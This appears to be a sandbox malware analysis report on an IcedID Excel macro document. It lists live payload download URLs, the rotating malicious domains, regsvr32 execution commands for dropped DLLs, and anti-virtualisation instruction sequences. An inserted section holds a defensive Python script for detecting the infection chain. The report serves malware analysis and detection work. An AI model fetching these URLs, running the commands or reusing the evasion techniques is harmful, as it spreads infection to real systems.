Source: 4.2.regsvr32.exe.190000.0.raw.unpack, type: UNPACKEDPE | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: 00000004.00000002.2096505255.0000000000190000.00000004.00000001.sdmp, type: MEMORY | Matched rule: MAL_IcedID_GZIP_LDR_202104 date = 2021-04-12, author = Thomas Barabosch, Telekom Security, description = 2021 initial Bokbot / Icedid loader for fake GZIP payloads, reference = https://www.telekom.com/en/blog/group/article/let-s-set-ice-on-fire-hunting-and-detecting-icedid-infections-627240
Source: regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSM@7/4@7/5
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Outfordelivery389402.xlsm
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRD3C2.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Windows\System32\regsvr32.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Windows\System32\regsvr32.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XTOWN.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XZIBIT.dll
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: Outfordelivery389402.xlsm | Initial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Outfordelivery389402.xlsm | Initial sample: OLE zip file path = xl/media/image1.png
Source: Outfordelivery389402.xlsm | Initial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
Source: Outfordelivery389402.xlsm | Initial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: lsdfik[1].fml.0.dr | Static PE information: real checksum: 0x1baf8 should be: 0x19d85
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process created: C:\Windows\System32\regsvr32.exe regsvr32 -silent ..\XRAY.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll

            Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\XTOWN.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX

            Malware Analysis System Evasion:

Contains functionality to detect hardware virtualization (CPUID execution measurement)
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_004D1E50
Tries to detect virtualization through RDTSC time measurements
Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 00000000004D1E71 second address: 00000000004D1E96 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 dec eax 0x00000007 or eax, edx 0x00000009 dec esp 0x0000000a mov eax, eax 0x0000000c xor ecx, ecx 0x0000000e mov eax, 00000001h 0x00000013 cpuid 0x00000015 mov dword ptr [esp+20h], eax 0x00000019 mov dword ptr [esp+24h], ebx 0x0000001d mov dword ptr [esp+28h], ecx 0x00000021 mov dword ptr [esp+2Ch], edx 0x00000025 rdtsc
Source: C:\Windows\System32\regsvr32.exe | RDTSC instruction interceptor: First address: 00000000004D1EAB second address: 00000000004D1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_004D2434 rdtsc
Source: C:\Windows\System32\regsvr32.exe | Code function: GetAdaptersInfo,GetAdaptersInfo,4_2_004D27BC
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fml
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | Binary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | Binary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | Binary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | Binary or memory string: Migrate and extend VMware environments to the AWS Cloud
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | Binary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | Binary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
Source: regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | Binary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
Source: C:\Windows\System32\regsvr32.exe | Process information queried: ProcessInformation
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_004D2434 rdtsc

            HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\System32\regsvr32.exe | Domain query: astrocycle.download
Source: C:\Windows\System32\regsvr32.exe | Domain query: aws.amazon.com
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 13.224.92.73 187
Source: C:\Windows\System32\regsvr32.exe | Network Connect: 172.67.213.115 80
Source: C:\Windows\System32\regsvr32.exe | Code function: 4_2_004D22DC LookupAccountNameW

            Stealing of Sensitive Information:

Yara detected IcedID
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2828, type: MEMORY

            Remote Access Functionality:

Yara detected IcedID
Source: Yara match | File source: dump.pcap, type: PCAP
Source: Yara match | File source: 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2100767048.0000000003401000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: regsvr32.exe PID: 2828, type: MEMORY

            Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
Valid Accounts | Scripting1 | Path Interception | Process Injection11 | Masquerading121 | OS Credential Dumping | Security Software Discovery211 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel12 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
Default Accounts | Exploitation for Client Execution43 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Disable or Modify Tools1 | LSASS Memory | Process Discovery1 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer14 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Process Injection11 | Security Account Manager | Account Discovery1 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol3 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Scripting1 | NTDS | System Owner/User Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol124 | SIM Card Swap |  | Carrier Billing Fraud
Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Regsvr321 | LSA Secrets | Remote System Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication |  | Manipulate App Store Rankings or Ratings
Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Network Configuration Discovery1 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service |  | Abuse Accessibility Features
External Remote Services | Scheduled Task | Startup Items | Startup Items | Compile After Delivery | DCSync | File and Directory Discovery1 | Windows Remote Management | Web Portal Capture | Exfiltration Over Alternative Protocol | Commonly Used Port | Rogue Wi-Fi Access Points |  | Data Encrypted for Impact
Drive-by Compromise | Command and Scripting Interpreter | Scheduled Task/Job | Scheduled Task/Job | Indicator Removal from Tools | Proc Filesystem | System Information Discovery22 | Shared Webroot | Credential API Hooking | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Application Layer Protocol | Downgrade to Insecure Protocols |  | Generate Fraudulent Advertising Revenue

            Behavior Graph


            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
Behavior Graph ID: 444803
Sample: Outfordelivery389402.xlsm
Start date: 06/07/2021
Architecture: WINDOWS
Score: 100

Sample-level signatures:
• Found malware configuration
• Document exploit detected (drops PE files)
• Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
• 6 other signatures

Process tree:

EXCEL.EXE (53 created registry values, 26 created files)
  DNS/IP:
  • uppercilio.fun, 104.21.55.83, ports 49169 and 80, CLOUDFLARENETUS, United States
  • voopeople.fun, 172.67.194.117, ports 49168 and 80, CLOUDFLARENETUS, United States
  • thousandsyears.download, 172.67.198.51, ports 49167 and 80, CLOUDFLARENETUS, United States
  Dropped files:
  • C:\Users\user\XTOWN.dll, PE32+
  • C:\Users\user\AppData\Local\...\lsdfik[1].fml, PE32+
  Signatures:
  • Document exploit detected (creates forbidden files)
  • Document exploit detected (UrlDownloadToFile)
  Started:
  → regsvr32.exe
      Signatures: System process connects to network (likely due to code injection or exploit); Contains functionality to detect hardware virtualization (CPUID execution measurement); Tries to detect virtualization through RDTSC time measurements
  → regsvr32.exe (counter: 4)
      DNS/IP: astrocycle.download, 172.67.213.115, ports 49171 and 80, CLOUDFLARENETUS, United States; dr49lng3n1n2s.cloudfront.net, 13.224.92.73, ports 443 and 49170, AMAZON-02US, United States; 2 other IPs or domains
  → regsvr32.exe
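The chain the graph shows (Excel fetches the same path from three rotating domains, writes PE32+ content under non-PE names, then hands C:\Users\user\XTOWN.dll to regsvr32.exe, which goes online) is what a detection engineer would want to check endpoint telemetry for. The following is an added example, not Joe Sandbox or report code: it identifies a written file whose bytes are a PE image despite a non-PE extension, and flags an Office process spawning regsvr32.exe with a DLL outside the system directories. The event classes, the Temp and Office install paths, and the constructed PE header bytes are assumptions for the demonstration, not data taken from the sample.

```python
"""Triage checks derived from the behavior graph above (added example, not Joe Sandbox code).
Every byte string and event below is constructed for the demonstration; none is from the sample."""
import ntpath
import struct
from dataclasses import dataclass

OFFICE_PARENTS = {"excel.exe", "winword.exe", "powerpnt.exe"}
PE_EXTENSIONS = {".exe", ".dll", ".sys", ".ocx", ".cpl", ".scr"}
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def pe_kind(data: bytes):
    """Return 'PE32', 'PE32+' or None by walking MZ -> e_lfanew -> 'PE\\0\\0' -> optional-header magic."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return None
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    # 4-byte signature + 20-byte COFF header precede the optional header; its first field is the magic
    if e_lfanew + 0x1A > len(data) or data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        return None
    magic = struct.unpack_from("<H", data, e_lfanew + 0x18)[0]
    return {0x10B: "PE32", 0x20B: "PE32+"}.get(magic)


def build_pe_stub(magic: int) -> bytes:
    """Constructed minimal PE header used only as test input (not a real binary)."""
    dos = bytearray(b"MZ" + b"\0" * 0x3E)          # 0x40-byte DOS header
    struct.pack_into("<I", dos, 0x3C, len(dos))    # e_lfanew points right after the DOS header
    return bytes(dos) + b"PE\0\0" + b"\0" * 20 + struct.pack("<H", magic) + b"\0" * 0x6E


@dataclass
class FileWrite:          # hypothetical file-write telemetry record
    process: str
    path: str
    content: bytes


@dataclass
class ProcessCreate:      # hypothetical process-creation telemetry record
    parent_image: str
    image: str
    command_line: str


def dll_args(command_line: str):
    """Tokens of a regsvr32 command line that name a DLL (quotes stripped, switches ignored)."""
    return [t.strip('"') for t in command_line.split() if t.strip('"').lower().endswith(".dll")]


def triage(events):
    """Return one finding string per event that matches the report's Excel -> regsvr32 chain."""
    findings = []
    for ev in events:
        if isinstance(ev, FileWrite):
            kind = pe_kind(ev.content)
            ext = ntpath.splitext(ev.path)[1].lower()
            if kind and ext not in PE_EXTENSIONS:   # executable bytes behind an image-like name
                findings.append(f"{ev.process} wrote a {kind} image with extension {ext or '(none)'}: {ev.path}")
        elif isinstance(ev, ProcessCreate):
            parent = ntpath.basename(ev.parent_image).lower()
            child = ntpath.basename(ev.image).lower()
            if parent in OFFICE_PARENTS and child == "regsvr32.exe":
                dlls = dll_args(ev.command_line)
                outside = [d for d in dlls if not d.lower().startswith(SYSTEM_DIRS)]
                findings.append(f"{parent} spawned regsvr32.exe loading {dlls} (outside system directories: {outside})")
    return findings


# Constructed events modelled on the graph: paths under Temp and the Office install path are assumptions.
SAMPLE_EVENTS = [
    FileWrite("EXCEL.EXE", r"C:\Users\user\AppData\Local\Temp\lsdfik[1].fml", build_pe_stub(0x20B)),
    FileWrite("EXCEL.EXE", r"C:\Users\user\XTOWN.dll", build_pe_stub(0x20B)),        # .dll: extension matches, no finding
    FileWrite("EXCEL.EXE", r"C:\Users\user\AppData\Local\Temp\real.jpg", b"\xff\xd8\xff\xe0" + b"\0" * 64),
    ProcessCreate(r"C:\Program Files\Microsoft Office\EXCEL.EXE", r"C:\Windows\System32\regsvr32.exe",
                  r"regsvr32.exe C:\Users\user\XTOWN.dll"),
    ProcessCreate(r"C:\Windows\explorer.exe", r"C:\Windows\System32\regsvr32.exe",
                  r"regsvr32.exe /s C:\Windows\System32\wuapi.dll"),                  # benign, not flagged
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS):
        print(line)
```

The extension check deliberately keys on the bytes rather than the name, because the report's drops carry .fml and .jpg-style names while the optional-header magic 0x20B identifies them as PE32+; a rule that only looked for .dll writes by Office would miss the first stage.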


            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            No Antivirus matches

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

Source | Detection | Scanner | Label
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | 0% | URL Reputation | safe
http://www.diginotar.nl/cps/pkioverheid0 | 0% | URL Reputation | safe
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom | 0% | URL Reputation | safe
http://ocsp.rootg2.amazontrust.com08 | 0% | URL Reputation | safe
http://voopeople.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
http://crl.sca1b.amazontrust.com/sca1b.crl0 | 0% | URL Reputation | safe
http://astrocycle.download/ | 0% | Avira URL Cloud | safe
http://servername/isapibackend.dll | 0% | Avira URL Cloud | safe
http://ocsp.sca1b.amazontrust.com06 | 0% | URL Reputation | safe
http://crt.rootg2.amazontrust.com/root | 0% | Avira URL Cloud | safe
http://crl.rootca1.amazontrust.com/rootca1.crl0 | 0% | URL Reputation | safe
http://ocsp.rootca1.amazontrust.com0: | 0% | Avira URL Cloud | safe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
http://crl.rootg2.amazontrust.com/rootg2.crl0 | 0% | URL Reputation | safe
http://uppercilio.fun/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
http://o.ss2.us/0 | 0% | URL Reputation | safe
http://thousandsyears.download/div/44376,8555986111.jpg | 0% | Avira URL Cloud | safe
http://ocsp.entrust.net03 | 0% | URL Reputation | safe
http://crt.rootg2.amazontrust.com/rootg2.cer0= | 0% | URL Reputation | safe
http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
http://www.%s.comPA | 0% | URL Reputation | safe
http://ocsp.entrust.net0D | 0% | URL Reputation | safe
http://s.ss2.us/r.crl0 | 0% | URL Reputation | safe

            Domains and IPs

            Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
uppercilio.fun | 104.21.55.83 | true | false | - | unknown
thousandsyears.download | 172.67.198.51 | true | false | - | unknown
voopeople.fun | 172.67.194.117 | true | false | - | unknown
astrocycle.download | 172.67.213.115 | true | true | - | unknown
dr49lng3n1n2s.cloudfront.net | 13.224.92.73 | true | false | - | high
aws.amazon.com | unknown | unknown | false | - | high

                        Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://voopeople.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
http://astrocycle.download/ | true | Avira URL Cloud: safe | unknown
http://uppercilio.fun/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown
http://thousandsyears.download/div/44376,8555986111.jpg | false | Avira URL Cloud: safe | unknown

                        URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
https://twitter.com/awscloud | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://a0.awsstatic.com/libra/1.0.385/directories | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/terms/?nc1=f_pr | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://dc.ads.linkedin.com/collect/?pid=3038&fmt=gif | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.html | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/cn/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0 | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://www.diginotar.nl/cps/pkioverheid0 | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://a0.awsstatic.com/libra-css/images | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://a0.awsstatic.com/libra/1.0.385/librastandardlib | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://a0.awsstatic.com/psf/null | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/ar/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://www.honeycode.aws/?&trk=el_a134p000003yC6YAAU&trkCampaign=pac-edm-2020-honeycode-hom | regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | false | URL Reputation: safe | unknown
https://pages.awscloud.com/zillow-case-study?hp=tile&story=zllw | regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | false | - | high
https://pages.awscloud.com/communication-preferences?trk=homepage | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
http://ocsp.rootg2.amazontrust.com08 | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://aws.amazon.com/cn/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&src=default | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/ru/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/tw/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowser | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://i18n-string.us-west-2.prod.pricing.aws.a2z.com | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/ko/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/ru/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://a0.awsstatic.com/libra-css/images/site/fav/favicon.ico | regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/es/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
http://crl.sca1b.amazontrust.com/sca1b.crl0 | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://docs.aws.amazon.com/index.html?nc2=h_ql_doc | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/ar/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
http://servername/isapibackend.dll | regsvr32.exe, 00000003.00000002.2089572858.0000000001E80000.00000002.00000001.sdmp; regsvr32.exe, 00000004.00000002.2096640594.0000000001CC0000.00000002.00000001.sdmp; regsvr32.exe, 00000005.00000002.2097273567.0000000001C30000.00000002.00000001.sdmp | false | Avira URL Cloud: safe | low
https://aws.amazon.com/th/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
http://www.windows.com/pctv. | regsvr32.exe, 00000004.00000002.2098287826.0000000003010000.00000002.00000001.sdmp | false | - | high
https://a0.awsstatic.com/pricing-calculator/js/1.0.2 | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://a0.awsstatic.com/plc/js/1.0.112/plc | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/marketplace/?nc2=h_mo | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
http://ocsp.sca1b.amazontrust.com06 | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://amazon.com/ | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | - | high
https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.png | regsvr32.exe, 00000004.00000003.2093230535.000000000343F000.00000004.00000001.sdmp | false | - | high
https://console.aws.amazon.com/support/home/?nc2=h_ql_cu | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
http://crt.rootg2.amazontrust.com/root | regsvr32.exe, 00000004.00000002.2096551491.000000000024E000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
http://crl.rootca1.amazontrust.com/rootca1.crl0 | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
https://aws.amazon.com/search/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credential | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/?nc2=h_lg | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
http://ocsp.rootca1.amazontrust.com0: | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
https://console.aws.amazon.com/support/home/?nc1=f_dr | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/fr/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
http://windowsmedia.com/redir/services.asp?WMPFriendly=true | regsvr32.exe, 00000004.00000002.2100037178.00000000031F7000.00000002.00000001.sdmp | false | URL Reputation: safe | unknown
https://console.aws.amazon.com/console/home?nc1=f_ct&src=footer-signin-mobile | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/vi/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://www.twitch.tv/aws | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/marketplace/?nc2=h_ql_mp | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/search | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://a0.awsstatic.com/libra/1.0.385/libra-head.js | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
http://crl.rootg2.amazontrust.com/rootg2.crl0 | regsvr32.exe, 00000004.00000002.2096565303.0000000000277000.00000004.00000020.sdmp | false | URL Reputation: safe | unknown
http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | regsvr32.exe, 00000004.00000002.2097777850.0000000002C20000.00000002.00000001.sdmp | false | - | high
https://a0.awsstatic.com/da/js/1.0.47/aws-da.js | regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/tw/ | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/tr/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
https://console.aws.amazon.com/?nc2=h_m_mc | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp | false | - | high
https://aws.amazon.com/fr/?nc1=h_ls | regsvr32.exe, 00000004.00000003.2093292708.0000000003402000.00000004.00000001.sdmp; regsvr32.exe, 00000004.00000002.2100781605.000000000343E000.00000004.00000001.sdmp | false | - | high
